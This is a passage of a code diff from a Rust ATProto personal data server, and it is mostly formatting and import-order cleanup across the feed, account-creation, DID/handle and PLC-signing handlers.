lag = get_local_lag(&local_records);
+12 -5
src/api/feed/custom_feed.rs
··· 1 + use crate::api::ApiError; 1 2 use crate::api::proxy_client::{ 2 - is_ssrf_safe, proxy_client, validate_at_uri, validate_limit, MAX_RESPONSE_SIZE, 3 + MAX_RESPONSE_SIZE, is_ssrf_safe, proxy_client, validate_at_uri, validate_limit, 3 4 }; 4 - use crate::api::ApiError; 5 5 use crate::state::AppState; 6 6 use axum::{ 7 7 extract::{Query, State}, ··· 61 61 let client = proxy_client(); 62 62 let mut request_builder = client.get(&target_url).query(&query_params); 63 63 if let Some(key_bytes) = auth_user.key_bytes.as_ref() { 64 - let appview_did = std::env::var("APPVIEW_DID").unwrap_or_else(|_| "did:web:api.bsky.app".to_string()); 65 - match crate::auth::create_service_token(&auth_user.did, &appview_did, "app.bsky.feed.getFeed", key_bytes) { 64 + let appview_did = 65 + std::env::var("APPVIEW_DID").unwrap_or_else(|_| "did:web:api.bsky.app".to_string()); 66 + match crate::auth::create_service_token( 67 + &auth_user.did, 68 + &appview_did, 69 + "app.bsky.feed.getFeed", 70 + key_bytes, 71 + ) { 66 72 Ok(service_token) => { 67 - request_builder = request_builder.header("Authorization", format!("Bearer {}", service_token)); 73 + request_builder = 74 + request_builder.header("Authorization", format!("Bearer {}", service_token)); 68 75 } 69 76 Err(e) => { 70 77 error!(error = ?e, "Failed to create service token for getFeed");
+41 -21
src/api/feed/post_thread.rs
··· 1 1 use crate::api::read_after_write::{ 2 - extract_repo_rev, format_local_post, format_munged_response, get_local_lag, 3 - get_records_since_rev, proxy_to_appview, PostRecord, PostView, RecordDescript, 2 + PostRecord, PostView, RecordDescript, extract_repo_rev, format_local_post, 3 + format_munged_response, get_local_lag, get_records_since_rev, proxy_to_appview, 4 4 }; 5 5 use crate::state::AppState; 6 6 use axum::{ 7 + Json, 7 8 extract::{Query, State}, 8 9 http::StatusCode, 9 10 response::{IntoResponse, Response}, 10 - Json, 11 11 }; 12 12 use serde::{Deserialize, Serialize}; 13 - use serde_json::{json, Value}; 13 + use serde_json::{Value, json}; 14 14 use std::collections::HashMap; 15 15 use tracing::warn; 16 16 ··· 39 39 #[derive(Debug, Clone, Serialize, Deserialize)] 40 40 #[serde(untagged)] 41 41 pub enum ThreadNode { 42 - Post(ThreadViewPost), 42 + Post(Box<ThreadViewPost>), 43 43 NotFound(ThreadNotFound), 44 44 Blocked(ThreadBlocked), 45 45 } ··· 96 96 }) 97 97 .map(|p| { 98 98 let post_view = format_local_post(p, author_did, author_handle, None); 99 - ThreadNode::Post(ThreadViewPost { 99 + ThreadNode::Post(Box::new(ThreadViewPost { 100 100 thread_type: Some("app.bsky.feed.defs#threadViewPost".to_string()), 101 101 post: post_view, 102 102 parent: None, 103 103 replies: None, 104 104 extra: HashMap::new(), 105 - }) 105 + })) 106 106 }) 107 107 .collect(); 108 108 if !replies.is_empty() { ··· 114 114 if let Some(ref mut existing_replies) = thread.replies { 115 115 for reply in existing_replies.iter_mut() { 116 116 if let ThreadNode::Post(reply_thread) = reply { 117 - add_replies_to_thread(reply_thread, local_posts, author_did, author_handle, depth + 1); 117 + add_replies_to_thread( 118 + reply_thread, 119 + local_posts, 120 + author_did, 121 + author_handle, 122 + depth + 1, 123 + ); 118 124 } 119 125 } 120 126 } ··· 128 134 let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok()); 129 135 let auth_user = if let Some(h) = auth_header { 130 136 if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) { 131 - crate::auth::validate_bearer_token(&state.db, &token).await.ok() 137 + crate::auth::validate_bearer_token(&state.db, &token) 138 + .await 139 + .ok() 132 140 } else { 133 141 None 134 142 } ··· 145 153 if let Some(parent_height) = params.parent_height { 146 154 query_params.insert("parentHeight".to_string(), parent_height.to_string()); 147 155 } 148 - let proxy_result = 149 - match proxy_to_appview("app.bsky.feed.getPostThread", &query_params, auth_did.as_deref().unwrap_or(""), auth_key_bytes.as_deref()).await { 150 - Ok(r) => r, 151 - Err(e) => return e, 152 - }; 156 + let proxy_result = match proxy_to_appview( 157 + "app.bsky.feed.getPostThread", 158 + &query_params, 159 + auth_did.as_deref().unwrap_or(""), 160 + auth_key_bytes.as_deref(), 161 + ) 162 + .await 163 + { 164 + Ok(r) => r, 165 + Err(e) => return e, 166 + }; 153 167 if proxy_result.status == StatusCode::NOT_FOUND { 154 168 return handle_not_found(&state, &params.uri, auth_did, &proxy_result.headers).await; 155 169 } ··· 193 207 } 194 208 }; 195 209 if let ThreadNode::Post(ref mut thread_post) = thread_output.thread { 196 - add_replies_to_thread(thread_post, &local_records.posts, &requester_did, &handle, 0); 210 + add_replies_to_thread( 211 + thread_post, 212 + &local_records.posts, 213 + &requester_did, 214 + &handle, 215 + 0, 216 + ); 197 217 } 198 218 let lag = get_local_lag(&local_records); 199 219 format_munged_response(thread_output, lag) ··· 212 232 StatusCode::NOT_FOUND, 213 233 Json(json!({"error": "NotFound", "message": "Post not found"})), 214 234 ) 215 - .into_response() 235 + .into_response(); 216 236 } 217 237 }; 218 238 let requester_did = match auth_did { ··· 222 242 StatusCode::NOT_FOUND, 223 243 Json(json!({"error": "NotFound", "message": "Post not found"})), 224 244 ) 225 - .into_response() 245 + .into_response(); 226 246 } 227 247 }; 228 248 let uri_parts: Vec<&str> = uri.trim_start_matches("at://").split('/').collect(); ··· 248 268 StatusCode::NOT_FOUND, 249 269 Json(json!({"error": "NotFound", "message": "Post not found"})), 250 270 ) 251 - .into_response() 271 + .into_response(); 252 272 } 253 273 }; 254 274 let local_post = local_records.posts.iter().find(|p| p.uri == uri); ··· 259 279 StatusCode::NOT_FOUND, 260 280 Json(json!({"error": "NotFound", "message": "Post not found"})), 261 281 ) 262 - .into_response() 282 + .into_response(); 263 283 } 264 284 }; 265 285 let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did) ··· 280 300 local_records.profile.as_ref(), 281 301 ); 282 302 let thread = PostThreadOutput { 283 - thread: ThreadNode::Post(ThreadViewPost { 303 + thread: ThreadNode::Post(Box::new(ThreadViewPost { 284 304 thread_type: Some("app.bsky.feed.defs#threadViewPost".to_string()), 285 305 post: post_view, 286 306 parent: None, 287 307 replies: None, 288 308 extra: HashMap::new(), 289 - }), 309 + })), 290 310 threadgate: None, 291 311 }; 292 312 let lag = get_local_lag(&local_records);
+45 -35
src/api/feed/timeline.rs
··· 1 1 use crate::api::read_after_write::{ 2 - extract_repo_rev, format_local_post, format_munged_response, get_local_lag, 3 - get_records_since_rev, insert_posts_into_feed, proxy_to_appview, FeedOutput, FeedViewPost, 4 - PostView, 2 + FeedOutput, FeedViewPost, PostView, extract_repo_rev, format_local_post, 3 + format_munged_response, get_local_lag, get_records_since_rev, insert_posts_into_feed, 4 + proxy_to_appview, 5 5 }; 6 6 use crate::state::AppState; 7 7 use axum::{ 8 + Json, 8 9 extract::{Query, State}, 9 10 http::StatusCode, 10 11 response::{IntoResponse, Response}, 11 - Json, 12 12 }; 13 13 use jacquard_repo::storage::BlockStore; 14 14 use serde::Deserialize; 15 - use serde_json::{json, Value}; 15 + use serde_json::{Value, json}; 16 16 use std::collections::HashMap; 17 17 use tracing::warn; 18 18 ··· 52 52 }; 53 53 match std::env::var("APPVIEW_URL") { 54 54 Ok(url) if !url.starts_with("http://127.0.0.1") => { 55 - return get_timeline_with_appview(&state, &params, &auth_user.did, auth_user.key_bytes.as_deref()).await; 55 + return get_timeline_with_appview( 56 + &state, 57 + &params, 58 + &auth_user.did, 59 + auth_user.key_bytes.as_deref(), 60 + ) 61 + .await; 56 62 } 57 63 _ => {} 58 64 } ··· 75 81 if let Some(cursor) = &params.cursor { 76 82 query_params.insert("cursor".to_string(), cursor.clone()); 77 83 } 78 - let proxy_result = 79 - match proxy_to_appview("app.bsky.feed.getTimeline", &query_params, auth_did, auth_key_bytes).await { 80 - Ok(r) => r, 81 - Err(e) => return e, 82 - }; 84 + let proxy_result = match proxy_to_appview( 85 + "app.bsky.feed.getTimeline", 86 + &query_params, 87 + auth_did, 88 + auth_key_bytes, 89 + ) 90 + .await 91 + { 92 + Ok(r) => r, 93 + Err(e) => return e, 94 + }; 83 95 if !proxy_result.status.is_success() { 84 96 return proxy_result.into_response(); 85 97 } ··· 127 139 } 128 140 129 141 async fn get_timeline_local_only(state: &AppState, auth_did: &str) -> Response { 130 - let user_id: uuid::Uuid = match sqlx::query_scalar!( 131 - "SELECT id FROM users WHERE did = $1", 132 - auth_did 133 - ) 134 - .fetch_optional(&state.db) 135 - .await 136 - { 137 - Ok(Some(id)) => id, 138 - Ok(None) => { 139 - return ( 140 - StatusCode::INTERNAL_SERVER_ERROR, 141 - Json(json!({"error": "InternalError", "message": "User not found"})), 142 - ) 143 - .into_response(); 144 - } 145 - Err(e) => { 146 - warn!("Database error fetching user: {:?}", e); 147 - return ( 148 - StatusCode::INTERNAL_SERVER_ERROR, 149 - Json(json!({"error": "InternalError", "message": "Database error"})), 150 - ) 151 - .into_response(); 152 - } 153 - }; 142 + let user_id: uuid::Uuid = 143 + match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", auth_did) 144 + .fetch_optional(&state.db) 145 + .await 146 + { 147 + Ok(Some(id)) => id, 148 + Ok(None) => { 149 + return ( 150 + StatusCode::INTERNAL_SERVER_ERROR, 151 + Json(json!({"error": "InternalError", "message": "User not found"})), 152 + ) 153 + .into_response(); 154 + } 155 + Err(e) => { 156 + warn!("Database error fetching user: {:?}", e); 157 + return ( 158 + StatusCode::INTERNAL_SERVER_ERROR, 159 + Json(json!({"error": "InternalError", "message": "Database error"})), 160 + ) 161 + .into_response(); 162 + } 163 + }; 154 164 let follows_query = sqlx::query!( 155 165 "SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.graph.follow' LIMIT 5000", 156 166 user_id
+91 -48
src/api/identity/account.rs
··· 1 1 use super::did::verify_did_web; 2 - use crate::plc::{create_genesis_operation, signing_key_to_did_key, PlcClient}; 2 + use crate::plc::{PlcClient, create_genesis_operation, signing_key_to_did_key}; 3 3 use crate::state::{AppState, RateLimitKind}; 4 4 use axum::{ 5 5 Json, ··· 10 10 use bcrypt::{DEFAULT_COST, hash}; 11 11 use jacquard::types::{did::Did, integer::LimitedU32, string::Tid}; 12 12 use jacquard_repo::{commit::Commit, mst::Mst, storage::BlockStore}; 13 - use k256::{ecdsa::SigningKey, SecretKey}; 13 + use k256::{SecretKey, ecdsa::SigningKey}; 14 14 use rand::rngs::OsRng; 15 15 use serde::{Deserialize, Serialize}; 16 16 use serde_json::json; ··· 18 18 use tracing::{error, info, warn}; 19 19 20 20 fn extract_client_ip(headers: &HeaderMap) -> String { 21 - if let Some(forwarded) = headers.get("x-forwarded-for") { 22 - if let Ok(value) = forwarded.to_str() { 23 - if let Some(first_ip) = value.split(',').next() { 21 + if let Some(forwarded) = headers.get("x-forwarded-for") 22 + && let Ok(value) = forwarded.to_str() 23 + && let Some(first_ip) = value.split(',').next() { 24 24 return first_ip.trim().to_string(); 25 25 } 26 - } 27 - } 28 - if let Some(real_ip) = headers.get("x-real-ip") { 29 - if let Ok(value) = real_ip.to_str() { 26 + if let Some(real_ip) = headers.get("x-real-ip") 27 + && let Ok(value) = real_ip.to_str() { 30 28 return value.trim().to_string(); 31 29 } 32 - } 33 30 "unknown".to_string() 34 31 } 35 32 ··· 64 61 ) -> Response { 65 62 info!("create_account called"); 66 63 let client_ip = extract_client_ip(&headers); 67 - if !state.check_rate_limit(RateLimitKind::AccountCreation, &client_ip).await { 64 + if !state 65 + .check_rate_limit(RateLimitKind::AccountCreation, &client_ip) 66 + .await 67 + { 68 68 warn!(ip = %client_ip, "Account creation rate limit exceeded"); 69 69 return ( 70 70 StatusCode::TOO_MANY_REQUESTS, ··· 84 84 ) 85 85 .into_response(); 86 86 } 87 - let email: Option<String> = input.email.as_ref() 87 + let email: Option<String> = input 88 + .email 89 + .as_ref() 88 90 .map(|e| e.trim().to_string()) 89 91 .filter(|e| !e.is_empty()); 90 - if let Some(ref email) = email { 91 - if !crate::api::validation::is_valid_email(email) { 92 + if let Some(ref email) = email 93 + && !crate::api::validation::is_valid_email(email) { 92 94 return ( 93 95 StatusCode::BAD_REQUEST, 94 96 Json(json!({"error": "InvalidEmail", "message": "Invalid email format"})), 95 97 ) 96 98 .into_response(); 97 99 } 98 - } 99 100 let verification_channel = input.verification_channel.as_deref().unwrap_or("email"); 100 101 let valid_channels = ["email", "discord", "telegram", "signal"]; 101 102 if !valid_channels.contains(&verification_channel) { ··· 220 221 } 221 222 }; 222 223 let plc_client = PlcClient::new(None); 223 - if let Err(e) = plc_client.send_operation(&genesis_result.did, &genesis_result.signed_operation).await { 224 + if let Err(e) = plc_client 225 + .send_operation(&genesis_result.did, &genesis_result.signed_operation) 226 + .await 227 + { 224 228 error!("Failed to submit PLC genesis operation: {:?}", e); 225 229 return ( 226 230 StatusCode::BAD_GATEWAY, ··· 269 273 } 270 274 }; 271 275 let plc_client = PlcClient::new(None); 272 - if let Err(e) = plc_client.send_operation(&genesis_result.did, &genesis_result.signed_operation).await { 276 + if let Err(e) = plc_client 277 + .send_operation(&genesis_result.did, &genesis_result.signed_operation) 278 + .await 279 + { 273 280 error!("Failed to submit PLC genesis operation: {:?}", e); 274 281 return ( 275 282 StatusCode::BAD_GATEWAY, ··· 316 323 Ok(None) => {} 317 324 } 318 325 if let Some(code) = &input.invite_code { 319 - let invite_query = 320 - sqlx::query!("SELECT available_uses FROM invite_codes WHERE code = $1 FOR UPDATE", code) 321 - .fetch_optional(&mut *tx) 322 - .await; 326 + let invite_query = sqlx::query!( 327 + "SELECT available_uses FROM invite_codes WHERE code = $1 FOR UPDATE", 328 + code 329 + ) 330 + .fetch_optional(&mut *tx) 331 + .await; 323 332 match invite_query { 324 333 Ok(Some(row)) => { 325 334 if row.available_uses <= 0 { ··· 378 387 discord_id, telegram_username, signal_number 379 388 ) VALUES ($1, $2, $3, $4, $5, $6, $7::notification_channel, $8, $9, $10) RETURNING id"#, 380 389 ) 381 - .bind(short_handle) 382 - .bind(&email) 383 - .bind(&did) 384 - .bind(&password_hash) 385 - .bind(&verification_code) 386 - .bind(&code_expires_at) 387 - .bind(verification_channel) 388 - .bind(input.discord_id.as_deref().map(|s| s.trim()).filter(|s| !s.is_empty())) 389 - .bind(input.telegram_username.as_deref().map(|s| s.trim()).filter(|s| !s.is_empty())) 390 - .bind(input.signal_number.as_deref().map(|s| s.trim()).filter(|s| !s.is_empty())) 391 - .fetch_one(&mut *tx) 392 - .await; 390 + .bind(short_handle) 391 + .bind(&email) 392 + .bind(&did) 393 + .bind(&password_hash) 394 + .bind(&verification_code) 395 + .bind(code_expires_at) 396 + .bind(verification_channel) 397 + .bind( 398 + input 399 + .discord_id 400 + .as_deref() 401 + .map(|s| s.trim()) 402 + .filter(|s| !s.is_empty()), 403 + ) 404 + .bind( 405 + input 406 + .telegram_username 407 + .as_deref() 408 + .map(|s| s.trim()) 409 + .filter(|s| !s.is_empty()), 410 + ) 411 + .bind( 412 + input 413 + .signal_number 414 + .as_deref() 415 + .map(|s| s.trim()) 416 + .filter(|s| !s.is_empty()), 417 + ) 418 + .fetch_one(&mut *tx) 419 + .await; 393 420 let user_id = match user_insert { 394 421 Ok((id,)) => id, 395 422 Err(e) => { 396 - if let Some(db_err) = e.as_database_error() { 397 - if db_err.code().as_deref() == Some("23505") { 423 + if let Some(db_err) = e.as_database_error() 424 + && db_err.code().as_deref() == Some("23505") { 398 425 let constraint = db_err.constraint().unwrap_or(""); 399 426 if constraint.contains("handle") || constraint.contains("users_handle") { 400 427 return ( ··· 425 452 .into_response(); 426 453 } 427 454 } 428 - } 429 455 error!("Error inserting user: {:?}", e); 430 456 return ( 431 457 StatusCode::INTERNAL_SERVER_ERROR, ··· 535 561 } 536 562 }; 537 563 let commit_cid_str = commit_cid.to_string(); 538 - let repo_insert = sqlx::query!("INSERT INTO repos (user_id, repo_root_cid) VALUES ($1, $2)", user_id, commit_cid_str) 539 - .execute(&mut *tx) 540 - .await; 564 + let repo_insert = sqlx::query!( 565 + "INSERT INTO repos (user_id, repo_root_cid) VALUES ($1, $2)", 566 + user_id, 567 + commit_cid_str 568 + ) 569 + .execute(&mut *tx) 570 + .await; 541 571 if let Err(e) = repo_insert { 542 572 error!("Error initializing repo: {:?}", e); 543 573 return ( ··· 547 577 .into_response(); 548 578 } 549 579 if let Some(code) = &input.invite_code { 550 - let use_insert = 551 - sqlx::query!("INSERT INTO invite_code_uses (code, used_by_user) VALUES ($1, $2)", code, user_id) 552 - .execute(&mut *tx) 553 - .await; 580 + let use_insert = sqlx::query!( 581 + "INSERT INTO invite_code_uses (code, used_by_user) VALUES ($1, $2)", 582 + code, 583 + user_id 584 + ) 585 + .execute(&mut *tx) 586 + .await; 554 587 if let Err(e) = use_insert { 555 588 error!("Error recording invite usage: {:?}", e); 556 589 return ( ··· 568 601 ) 569 602 .into_response(); 570 603 } 571 - if let Err(e) = crate::api::repo::record::sequence_identity_event(&state, &did, Some(&full_handle)).await { 604 + if let Err(e) = 605 + crate::api::repo::record::sequence_identity_event(&state, &did, Some(&full_handle)).await 606 + { 572 607 warn!("Failed to sequence identity event for {}: {}", did, e); 573 608 } 574 - if let Err(e) = crate::api::repo::record::sequence_account_event(&state, &did, true, None).await { 609 + if let Err(e) = crate::api::repo::record::sequence_account_event(&state, &did, true, None).await 610 + { 575 611 warn!("Failed to sequence account event for {}: {}", did, e); 576 612 } 577 613 let profile_record = json!({ ··· 584 620 "app.bsky.actor.profile", 585 621 "self", 586 622 &profile_record, 587 - ).await { 623 + ) 624 + .await 625 + { 588 626 warn!("Failed to create default profile for {}: {}", did, e); 589 627 } 590 628 if let Err(e) = crate::notifications::enqueue_signup_verification( ··· 593 631 verification_channel, 594 632 &verification_recipient, 595 633 &verification_code, 596 - ).await { 597 - warn!("Failed to enqueue signup verification notification: {:?}", e); 634 + ) 635 + .await 636 + { 637 + warn!( 638 + "Failed to enqueue signup verification notification: {:?}", 639 + e 640 + ); 598 641 } 599 642 ( 600 643 StatusCode::OK,
+57 -34
src/api/identity/did.rs
··· 47 47 .await; 48 48 match user { 49 49 Ok(Some(row)) => { 50 - let _ = state.cache.set(&cache_key, &row.did, std::time::Duration::from_secs(300)).await; 50 + let _ = state 51 + .cache 52 + .set(&cache_key, &row.did, std::time::Duration::from_secs(300)) 53 + .await; 51 54 (StatusCode::OK, Json(json!({ "did": row.did }))).into_response() 52 55 } 53 56 Ok(None) => ( ··· 127 130 ) 128 131 .into_response(); 129 132 } 130 - let key_row = sqlx::query!("SELECT key_bytes, encryption_version FROM user_keys WHERE user_id = $1", user_id) 131 - .fetch_optional(&state.db) 132 - .await; 133 + let key_row = sqlx::query!( 134 + "SELECT key_bytes, encryption_version FROM user_keys WHERE user_id = $1", 135 + user_id 136 + ) 137 + .fetch_optional(&state.db) 138 + .await; 133 139 let key_bytes: Vec<u8> = match key_row { 134 - Ok(Some(row)) => { 135 - match crate::config::decrypt_key(&row.key_bytes, row.encryption_version) { 136 - Ok(k) => k, 137 - Err(_) => { 138 - return ( 139 - StatusCode::INTERNAL_SERVER_ERROR, 140 - Json(json!({"error": "InternalError"})), 141 - ) 142 - .into_response(); 143 - } 140 + Ok(Some(row)) => match crate::config::decrypt_key(&row.key_bytes, row.encryption_version) { 141 + Ok(k) => k, 142 + Err(_) => { 143 + return ( 144 + StatusCode::INTERNAL_SERVER_ERROR, 145 + Json(json!({"error": "InternalError"})), 146 + ) 147 + .into_response(); 144 148 } 145 - } 149 + }, 146 150 _ => { 147 151 return ( 148 152 StatusCode::INTERNAL_SERVER_ERROR, ··· 283 287 headers: axum::http::HeaderMap, 284 288 ) -> Response { 285 289 let token = match crate::auth::extract_bearer_token_from_header( 286 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 290 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 287 291 ) { 288 292 Some(t) => t, 289 293 None => { ··· 298 302 Ok(user) => user, 299 303 Err(e) => return ApiError::from(e).into_response(), 300 304 }; 301 - let user = match sqlx::query!("SELECT handle FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.did = $1", auth_user.did) 302 - .fetch_optional(&state.db) 303 - .await 305 + let user = match sqlx::query!( 306 + "SELECT handle FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.did = $1", 307 + auth_user.did 308 + ) 309 + .fetch_optional(&state.db) 310 + .await 304 311 { 305 312 Ok(Some(row)) => row, 306 313 _ => return ApiError::InternalError.into_response(), 307 314 }; 308 315 let key_bytes = match auth_user.key_bytes { 309 316 Some(kb) => kb, 310 - None => return ApiError::AuthenticationFailedMsg("OAuth tokens cannot get DID credentials".into()).into_response(), 317 + None => { 318 + return ApiError::AuthenticationFailedMsg( 319 + "OAuth tokens cannot get DID credentials".into(), 320 + ) 321 + .into_response(); 322 + } 311 323 }; 312 324 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 313 325 let pds_endpoint = format!("https://{}", hostname); ··· 352 364 Json(input): Json<UpdateHandleInput>, 353 365 ) -> Response { 354 366 let token = match crate::auth::extract_bearer_token_from_header( 355 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 367 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 356 368 ) { 357 369 Some(t) => t, 358 370 None => return ApiError::AuthenticationRequired.into_response(), ··· 378 390 { 379 391 return ( 380 392 StatusCode::BAD_REQUEST, 381 - Json(json!({"error": "InvalidHandle", "message": "Handle contains invalid characters"})), 393 + Json( 394 + json!({"error": "InvalidHandle", "message": "Handle contains invalid characters"}), 395 + ), 382 396 ) 383 397 .into_response(); 384 398 } ··· 387 401 .await 388 402 .ok() 389 403 .flatten(); 390 - let existing = sqlx::query!("SELECT id FROM users WHERE handle = $1 AND id != $2", new_handle, user_id) 391 - .fetch_optional(&state.db) 392 - .await; 404 + let existing = sqlx::query!( 405 + "SELECT id FROM users WHERE handle = $1 AND id != $2", 406 + new_handle, 407 + user_id 408 + ) 409 + .fetch_optional(&state.db) 410 + .await; 393 411 if let Ok(Some(_)) = existing { 394 412 return ( 395 413 StatusCode::BAD_REQUEST, ··· 397 415 ) 398 416 .into_response(); 399 417 } 400 - let result = sqlx::query!("UPDATE users SET handle = $1 WHERE id = $2", new_handle, user_id) 401 - .execute(&state.db) 402 - .await; 418 + let result = sqlx::query!( 419 + "UPDATE users SET handle = $1 WHERE id = $2", 420 + new_handle, 421 + user_id 422 + ) 423 + .execute(&state.db) 424 + .await; 403 425 match result { 404 426 Ok(_) => { 405 427 if let Some(old) = old_handle { 406 428 let _ = state.cache.delete(&format!("handle:{}", old)).await; 407 429 } 408 430 let _ = state.cache.delete(&format!("handle:{}", new_handle)).await; 409 - let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 431 + let hostname = 432 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 410 433 let full_handle = format!("{}.{}", new_handle, hostname); 411 - if let Err(e) = crate::api::repo::record::sequence_identity_event(&state, &did, Some(&full_handle)).await { 434 + if let Err(e) = 435 + crate::api::repo::record::sequence_identity_event(&state, &did, Some(&full_handle)) 436 + .await 437 + { 412 438 warn!("Failed to sequence identity event for handle update: {}", e); 413 439 } 414 440 (StatusCode::OK, Json(json!({}))).into_response() ··· 424 450 } 425 451 } 426 452 427 - pub async fn well_known_atproto_did( 428 - State(state): State<AppState>, 429 - headers: HeaderMap, 430 - ) -> Response { 453 + pub async fn well_known_atproto_did(State(state): State<AppState>, headers: HeaderMap) -> Response { 431 454 let host = match headers.get("host").and_then(|h| h.to_str().ok()) { 432 455 Some(h) => h, 433 456 None => return (StatusCode::BAD_REQUEST, "Missing host header").into_response(),
+2 -2
src/api/identity/mod.rs
··· 4 4 5 5 pub use account::create_account; 6 6 pub use did::{ 7 - get_recommended_did_credentials, resolve_handle, update_handle, user_did_doc, well_known_did, 8 - well_known_atproto_did, 7 + get_recommended_did_credentials, resolve_handle, update_handle, user_did_doc, 8 + well_known_atproto_did, well_known_did, 9 9 }; 10 10 pub use plc::{request_plc_operation_signature, sign_plc_operation, submit_plc_operation};
+2 -2
src/api/identity/plc/mod.rs
··· 3 3 mod submit; 4 4 5 5 pub use request::request_plc_operation_signature; 6 - pub use sign::{sign_plc_operation, ServiceInput, SignPlcOperationInput, SignPlcOperationOutput}; 7 - pub use submit::{submit_plc_operation, SubmitPlcOperationInput}; 6 + pub use sign::{ServiceInput, SignPlcOperationInput, SignPlcOperationOutput, sign_plc_operation}; 7 + pub use submit::{SubmitPlcOperationInput, submit_plc_operation};
+7 -9
src/api/identity/plc/request.rs
··· 1 1 use crate::api::ApiError; 2 2 use crate::state::AppState; 3 3 use axum::{ 4 + Json, 4 5 extract::State, 5 6 http::StatusCode, 6 7 response::{IntoResponse, Response}, 7 - Json, 8 8 }; 9 9 use chrono::{Duration, Utc}; 10 10 use serde_json::json; ··· 67 67 .into_response(); 68 68 } 69 69 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 70 - if let Err(e) = crate::notifications::enqueue_plc_operation( 71 - &state.db, 72 - user.id, 73 - &plc_token, 74 - &hostname, 75 - ) 76 - .await 70 + if let Err(e) = 71 + crate::notifications::enqueue_plc_operation(&state.db, user.id, &plc_token, &hostname).await 77 72 { 78 73 warn!("Failed to enqueue PLC operation notification: {:?}", e); 79 74 } 80 - info!("PLC operation signature requested for user {}", auth_user.did); 75 + info!( 76 + "PLC operation signature requested for user {}", 77 + auth_user.did 78 + ); 81 79 (StatusCode::OK, Json(json!({}))).into_response() 82 80 }
+24 -17
src/api/identity/plc/sign.rs
··· 1 1 use crate::api::ApiError; 2 - use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError}; 2 + use crate::circuit_breaker::{CircuitBreakerError, with_circuit_breaker}; 3 3 use crate::plc::{ 4 - create_update_op, sign_operation, PlcClient, PlcError, PlcOpOrTombstone, PlcService, 4 + PlcClient, PlcError, PlcOpOrTombstone, PlcService, create_update_op, sign_operation, 5 5 }; 6 6 use crate::state::AppState; 7 7 use axum::{ 8 + Json, 8 9 extract::State, 9 10 http::StatusCode, 10 11 response::{IntoResponse, Response}, 11 - Json, 12 12 }; 13 13 use chrono::Utc; 14 14 use k256::ecdsa::SigningKey; 15 15 use serde::{Deserialize, Serialize}; 16 - use serde_json::{json, Value}; 16 + use serde_json::{Value, json}; 17 17 use std::collections::HashMap; 18 18 use tracing::{error, info, warn}; 19 19 ··· 59 59 Some(t) => t, 60 60 None => { 61 61 return ApiError::InvalidRequest( 62 - "Email confirmation token required to sign PLC operations".into() 63 - ).into_response(); 62 + "Email confirmation token required to sign PLC operations".into(), 63 + ) 64 + .into_response(); 64 65 } 65 66 }; 66 67 let user = match sqlx::query!("SELECT id FROM users WHERE did = $1", did) ··· 105 106 } 106 107 }; 107 108 if Utc::now() > token_row.expires_at { 108 - let _ = sqlx::query!("DELETE FROM plc_operation_tokens WHERE id = $1", token_row.id) 109 - .execute(&state.db) 110 - .await; 109 + let _ = sqlx::query!( 110 + "DELETE FROM plc_operation_tokens WHERE id = $1", 111 + token_row.id 112 + ) 113 + .execute(&state.db) 114 + .await; 111 115 return ( 112 116 StatusCode::BAD_REQUEST, 113 117 Json(json!({ ··· 158 162 }; 159 163 let plc_client = PlcClient::new(None); 160 164 let did_clone = did.clone(); 161 - let result: Result<PlcOpOrTombstone, CircuitBreakerError<PlcError>> = with_circuit_breaker( 162 - &state.circuit_breakers.plc_directory, 163 - || async { plc_client.get_last_op(&did_clone).await }, 164 - ) 165 - .await; 165 + let result: Result<PlcOpOrTombstone, CircuitBreakerError<PlcError>> = 166 + with_circuit_breaker(&state.circuit_breakers.plc_directory, || async { 167 + plc_client.get_last_op(&did_clone).await 168 + }) 169 + .await; 166 170 let last_op = match result { 167 171 Ok(op) => op, 168 172 Err(CircuitBreakerError::CircuitOpen(e)) => { ··· 259 263 .into_response(); 260 264 } 261 265 }; 262 - let _ = sqlx::query!("DELETE FROM plc_operation_tokens WHERE id = $1", token_row.id) 263 - .execute(&state.db) 264 - .await; 266 + let _ = sqlx::query!( 267 + "DELETE FROM plc_operation_tokens WHERE id = $1", 268 + token_row.id 269 + ) 270 + .execute(&state.db) 271 + .await; 265 272 info!("Signed PLC operation for user {}", did); 266 273 ( 267 274 StatusCode::OK,
+16 -17
src/api/identity/plc/submit.rs
··· 1 1 use crate::api::ApiError; 2 - use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError}; 3 - use crate::plc::{signing_key_to_did_key, validate_plc_operation, PlcClient, PlcError}; 2 + use crate::circuit_breaker::{CircuitBreakerError, with_circuit_breaker}; 3 + use crate::plc::{PlcClient, PlcError, signing_key_to_did_key, validate_plc_operation}; 4 4 use crate::state::AppState; 5 5 use axum::{ 6 + Json, 6 7 extract::State, 7 8 http::StatusCode, 8 9 response::{IntoResponse, Response}, 9 - Json, 10 10 }; 11 11 use k256::ecdsa::SigningKey; 12 12 use serde::Deserialize; 13 - use serde_json::{json, Value}; 13 + use serde_json::{Value, json}; 14 14 use tracing::{error, info, warn}; 15 15 16 16 #[derive(Debug, Deserialize)] ··· 110 110 .into_response(); 111 111 } 112 112 } 113 - if let Some(services) = op.get("services").and_then(|v| v.as_object()) { 114 - if let Some(pds) = services.get("atproto_pds").and_then(|v| v.as_object()) { 113 + if let Some(services) = op.get("services").and_then(|v| v.as_object()) 114 + && let Some(pds) = services.get("atproto_pds").and_then(|v| v.as_object()) { 115 115 let service_type = pds.get("type").and_then(|v| v.as_str()); 116 116 let endpoint = pds.get("endpoint").and_then(|v| v.as_str()); 117 117 if service_type != Some("AtprotoPersonalDataServer") { ··· 135 135 